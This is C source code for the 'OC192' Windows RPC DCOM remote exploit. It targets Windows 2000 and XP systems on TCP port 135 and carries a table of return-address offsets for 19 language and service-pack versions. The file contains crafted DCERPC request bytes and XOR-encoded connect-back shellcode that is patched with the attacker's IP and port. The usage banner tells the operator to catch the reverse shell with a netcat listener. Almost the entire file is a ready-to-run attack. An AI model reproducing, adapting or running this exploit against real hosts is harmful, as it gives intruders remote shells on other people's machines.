
  1. //////////////////////////////////////////////////////////////////////////////////////////////
  2. //
  3. //             Windows RPC DCOM Remote Exploit with 18 Targets
  4. //                  by pHrail and smurfy + some offsets by teos
  5. //            
  6. //  Targets: 
  7. //                0 Win2k Polish nosp ver 5.00.2195
  8. //                1 Win2k Polish +sp3 ver 5.00.2195
  9. //                2 Win2k Spanish +sp4
  10. //                3 Win2k English nosp 1
  11. //                4 Win2k English nosp 2
  12. //                5 Win2k English +sp1
  13. //                6 Win2k English +sp2 1
  14. //                7 Win2k English +sp2 2
  15. //                8 Win2k English +sp3 1
  16. //                9 Win2k English +sp3 2
  17. //                10 Win2k English +sp4
  18. //                11 Win2k China +sp3
  19. //                12 Win2k China +sp4
  20. //                13 Win2k German +sp3
  21. //                14 Win2k Japanese +sp2
  22. //                15 WinXP English nosp ver 5.1.2600
  23. //                16 WinXP English +sp1 1
  24. //                17 WinXP English +sp1 2
  25. //                18 WinXP English +sp2
  26. //
  27. //////////////////////////////////////////////////////////////////////////////////////////////
  28.  
  29.  
  30.  
  31. #include <stdio.h>
  32. #include <stdlib.h>
  33. #include <unistd.h>
  34. #include <errno.h>
  35. #include <string.h>
  36. #include <netdb.h>
  37. #include <sys/types.h>
  38. #include <netinet/in.h>
  39. #include <sys/socket.h>
  40.  
  41. #define DWORD unsigned long
  42. #define SOCKET_ERROR -1
  43.  
  44. unsigned char bindstr[]={
  45. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
  46. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
  47. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
  48. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
  49. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  50.  
  51. unsigned char request1[]={
  52. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
  53. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
  54. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
  55. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
  56. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
  57. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
  58. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
  59. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
  60. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
  61. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  62. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  63. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
  64. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
  65. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
  66. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  67. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
  68. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
  69. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
  70. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
  71. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
  72. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
  73. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
  74. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
  75. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
  76. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
  77. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
  78. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
  79. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  80. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  81. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  82. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  83. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
  84. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
  85. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
  86. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
  87. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
  88. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
  89. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
  90. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  91. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
  92. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
  93. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
  94. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
  95. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
  96. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
  97. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  98. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
  99. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
  100. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  101. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
  102. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
  103. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  104. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
  105. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
  106. ,0x00,0x00,0x00,0x00,0x00,0x00};
  107.  
  108. unsigned char request2[]={
  109. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
  110. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
  111.  
  112. unsigned char request3[]={
  113. 0x5C,0x00
  114. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
  115. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  116. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  117. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  118.  
  119.  
  120.  
  121. /* Myam add OFFSETS*/
  122. char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
  123. char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
  124. char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
  125. char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
  126. char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
  127. char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
  128. char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
  129. char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
  130. char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
  131. char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
  132. char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
  133. char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
  134. char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
  135. char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
  136. char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
  137. char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
  138. char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
  139. char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
  140. char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */
  141.  
  142.  
  143.  
  144.  
  145.  
  146. /* Test this offset
  147. ( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
  148. Windows 2000 (no-service-pack) English 0x77e33f6d
  149. 0x77f92a9b
  150. 0x77e2afc5
  151. 0x772254b0 win2k3
  152. 0x77E829E3 / 0x77E83587 kokanin win2k sp3
  153. */ 
  154. unsigned char sc[]=
  155. "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
  156. "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  157. "\x46\x00\x58\x00\x46\x00\x58\x00"
  158.  
  159.  
  160. "\x29\x4c\xdf\x77" //sp4
  161. //"\x29\x2c\xe2\x77"//0x77e22c29
  162.  
  163.  
  164. "\x38\x6e\x16\x76\x0d\x6e\x16\x76" 
  165. //下面是SHELLCODE,可以
  166. //SHELLCODE不存在0X00,0X00与0X5C
  167. "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
  168. "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
  169. "\x93\x40\xe2\xfa"
  170. // code 
  171. "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
  172. "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
  173. "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
  174. "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
  175. "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
  176. "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
  177. "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
  178. "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
  179. "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
  180. "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
  181. "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
  182. "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
  183. "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
  184. "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
  185. "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
  186. "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
  187. "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
  188. "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
  189. "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
  190. "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
  191. "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
  192. "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
  193. "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
  194. "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
  195. "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
  196. "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
  197. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  198.  
  199. unsigned char request4[]={
  200. 0x01,0x10
  201. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
  202. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
  203. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  204. };
  205.  
/*
 * Entry point.
 *
 * Arguments (as printed by the usage banner below):
 *   argv[1]  host to connect to (resolved with gethostbyname)
 *   argv[2]  connect-back IP, argv[3] connect-back port, argv[4] target index 0..18
 *
 * Flow: resolve argv[1], open a TCP connection to port 135, copy the table
 * entry selected by argv[4] into sc, assemble buf2 from request1, request2,
 * sc, request3 and request4, send bindstr followed by buf2, and read two
 * replies into buf1.  Exits with status 1 on a usage, resolution, socket or
 * connect error; send/recv results after that are only partially checked.
 */
int main(int argc,char ** argv)
{

int len, len1, sockfd;
short port=135;                /* destination TCP port */
struct hostent *he;
struct sockaddr_in their_addr;


unsigned char buf1[0x1000];    /* receive buffer */
unsigned char buf2[0x1000];    /* assembled request */
unsigned short port1;


DWORD cb;



printf("OC192 RPC DCOM Remote Exploit BSD/Linux Port, thanks LSD and XFORCE\n");


if(argc<5)
{

printf("[<$>] OC192 RPC Remote Windows Exploit\n");
printf("[<$>] by pHrail and smurfy + some offsets by teos\n");
printf("[<$>] Thanks to LSD and XForce\n");
printf("[<$>] Usage: %s <victim> <connectback ip> <cb port> <target>\n",argv[0]);
printf("[<$>] On connect back nc -lp cbport\n");
printf("[<$>] Targets: 0 Win2k Polish nosp ver 5.00.2195\n");
printf("[<$>] 1 Win2k Polish +sp3 ver 5.00.2195\n");
printf("[<$>] 2 Win2k Spanish +sp4\n");
printf("[<$>] 3 Win2k English nosp 1\n");
printf("[<$>] 4 Win2k English nosp 2\n");
printf("[<$>] 5 Win2k English +sp1\n");
printf("[<$>] 6 Win2k English +sp2 1\n");
printf("[<$>] 7 Win2k English +sp2 2\n");
printf("[<$>] 8 Win2k English +sp3 1\n");
printf("[<$>] 9 Win2k English +sp3 2\n");
printf("[<$>] 10 Win2k English +sp4\n");
printf("[<$>] 11 Win2k China +sp3\n");
printf("[<$>] 12 Win2k China +sp4\n");
printf("[<$>] 13 Win2k German +sp3\n");
printf("[<$>] 14 Win2k Japanese +sp2\n");
printf("[<$>] 15 WinXP English nosp ver 5.1.2600\n");
printf("[<$>] 16 WinXP English +sp1 1\n");
printf("[<$>] 17 WinXP English +sp1 2\n");
printf("[<$>] 18 WinXP English +sp2\n");
exit(1);
}


if ((he=gethostbyname(argv[1])) == NULL) { // get the host info

perror("gethostbyname");

exit(1);

}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

perror("socket");

exit(1);

}


their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);


if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);

exit(1);
}



/* Select the table entry for the target index in argv[4].  atoi() is
 * re-evaluated in every branch, and an index outside 0..18 matches no
 * branch, so sc is then left unchanged. */
if(atoi(argv[4])==0)
memcpy(sc+36,win2knosppl,sizeof(win2knosppl));
else if (atoi(argv[4])==1)
memcpy(sc+36,win2ksp3pl,sizeof(win2ksp3pl));
else if (atoi(argv[4])==2)
memcpy(sc+36,win2ksp4sp,sizeof(win2ksp4sp));
else if (atoi(argv[4])==3)
memcpy(sc+36,win2knospeng1,sizeof(win2knospeng1));
else if (atoi(argv[4])==4)
memcpy(sc+36,win2knospeng2,sizeof(win2knospeng2));
else if (atoi(argv[4])==5)
memcpy(sc+36,win2ksp1eng,sizeof(win2ksp1eng));
else if (atoi(argv[4])==6)
memcpy(sc+36,win2ksp2eng1,sizeof(win2ksp2eng1));
else if (atoi(argv[4])==7)
memcpy(sc+36,win2ksp2eng2,sizeof(win2ksp2eng2));
else if (atoi(argv[4])==8)
memcpy(sc+36,win2ksp3eng1,sizeof(win2ksp3eng1));
else if (atoi(argv[4])==9)
memcpy(sc+36,win2ksp3eng2,sizeof(win2ksp3eng2));
else if (atoi(argv[4])==10)
memcpy(sc+36,win2ksp4eng,sizeof(win2ksp4eng));
else if (atoi(argv[4])==11)
memcpy(sc+36,win2ksp3chi,sizeof(win2ksp3chi));
else if (atoi(argv[4])==12)
memcpy(sc+36,win2ksp4chi,sizeof(win2ksp4chi));
else if (atoi(argv[4])==13)
memcpy(sc+36,win2ksp3ger,sizeof(win2ksp3ger));
else if (atoi(argv[4])==14)
memcpy(sc+36,win2ksp2jap,sizeof(win2ksp2jap));
else if (atoi(argv[4])==15)
memcpy(sc+36,winxpnospeng,sizeof(winxpnospeng));
else if (atoi(argv[4])==16)
memcpy(sc+36,winxpsp1eng1,sizeof(winxpsp1eng1));
else if (atoi(argv[4])==17)
memcpy(sc+36,winxpsp1eng2,sizeof(winxpsp1eng2));
else if (atoi(argv[4])==18)
memcpy(sc+36,winxpsp2eng,sizeof(winxpsp2eng));
/* argv[3] and argv[2] are XOR-masked with 0x93 bytes and stored into sc. */
port1 = htons(atoi(argv[3]));
port1 ^= 0x9393;
cb=inet_addr(argv[2]); 
cb ^= 0x93939393;
*(unsigned short *)&sc[330+0x30] = port1;
*(unsigned int *)&sc[335+0x30] = cb;
len=sizeof(sc);
/* Assemble buf2 as request1 | request2 | sc | request3 | request4;
 * len1 tracks the total number of bytes written. */
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);

/* The DWORDs at these offsets in request2 and buf2 are increased by
 * amounts derived from sizeof(sc). */
*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; 
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;



/* Send bindstr first, then the assembled buf2; each send is followed by a
 * recv whose return value is stored in len but never examined. */
if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){
printf("Send failed pussy.\n");
exit(1);
}

/* NOTE(review): the recv flags argument is written as NULL (a pointer
 * constant) where an int is expected. */
len=recv(sockfd,buf1,1000,NULL);
if (send(sockfd,buf2,len1,0)==SOCKET_ERROR) {

printf("Send failed pussy\n");
return;  /* NOTE(review): bare return in a non-void function */
}
len=recv(sockfd,buf1,1024,NULL);

}